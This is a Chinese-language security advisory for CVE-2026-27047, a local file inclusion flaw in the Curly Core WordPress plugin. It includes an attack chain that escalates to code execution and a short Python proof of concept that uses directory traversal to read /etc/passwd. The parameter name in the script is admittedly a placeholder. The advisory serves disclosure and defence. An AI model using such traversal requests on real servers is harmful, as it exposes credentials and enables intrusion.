CVE-2026-27047 CVSS 8.1 高危

CVE-2026-27047: Curly Core插件本地文件包含漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27047

漏洞类型

本地文件包含 (LFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Mikado-Themes Curly Core

漏洞概述

Mikado-Themes Curly Core插件存在严重的文件名控制不当漏洞，受影响版本范围包括2.1.6及之前所有版本。该漏洞由于PHP程序中Include/Require语句处理不当导致，允许攻击者在无需认证的情况下执行PHP本地文件包含攻击。成功利用此漏洞可能导致敏感信息泄露、数据完整性受损及服务中断，安全风险极高。

技术细节

该漏洞属于典型的PHP本地文件包含（LFI）漏洞，核心原因在于Mikado-Themes Curly Core插件在处理Include/Require语句时，未能对文件名参数实施有效的过滤机制。攻击者可以通过发送特制的HTTP请求，注入包含目录遍历序列（如“../”）的恶意参数，从而突破预设的目录限制，访问服务器上的任意文件。由于该漏洞无需认证且无需用户交互，利用门槛较低。攻击者通常利用此漏洞读取敏感配置（如wp-config.php）或系统关键文件（如/etc/passwd）。在特定环境下，结合日志投毒或Session文件包含技术，攻击者甚至可能将LFI升级为远程代码执行（RCE），导致服务器被完全控制，造成严重的数据泄露和可用性问题。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了Mikado-Themes Curly Core插件，且版本在2.1.6及以下。

STEP 2

漏洞探测

攻击者构造包含目录遍历字符（如'../'）的恶意HTTP请求，发送至存在漏洞的PHP脚本。

STEP 3

文件读取

服务器端未正确过滤参数，直接将其传递给include/require函数，导致攻击者成功读取服务器上的敏感文件（如/etc/passwd或wp-config.php）。

STEP 4

权限提升

结合日志投毒或其他技术，攻击者可能将本地文件包含升级为远程代码执行，从而完全控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-27047 (Local File Inclusion)
# This script demonstrates checking for the vulnerability by attempting to read /etc/passwd

import requests

def check_poc(target_url):
    # The vulnerable endpoint usually involves a parameter specifying a file path
    # Based on the vulnerability type, we simulate a directory traversal attack
    vuln_endpoint = "?path=../../../../etc/passwd"  # Placeholder parameter name
    
    full_url = f"{target_url}{vuln_endpoint}"
    
    try:
        response = requests.get(full_url, timeout=10)
        
        # Check if the response contains typical /etc/passwd markers
        if "root:x:0:0" in response.text:
            return "[+] Vulnerability confirmed! /etc/passwd file leaked."
        else:
            return "[-] Target might not be vulnerable or patched."
            
    except requests.exceptions.RequestException as e:
        return f"[!] Error connecting to target: {e}"

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://example.com/wp-content/plugins/curly-core/"
    print(check_poc(target))

影响范围

Mikado-Themes Curly Core <= 2.1.6

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Curly Core插件以阻断攻击链。同时，检查服务器日志中是否存在异常的文件包含请求，并限制Web服务器对敏感系统文件（如/etc/passwd, wp-config.php）的读取权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表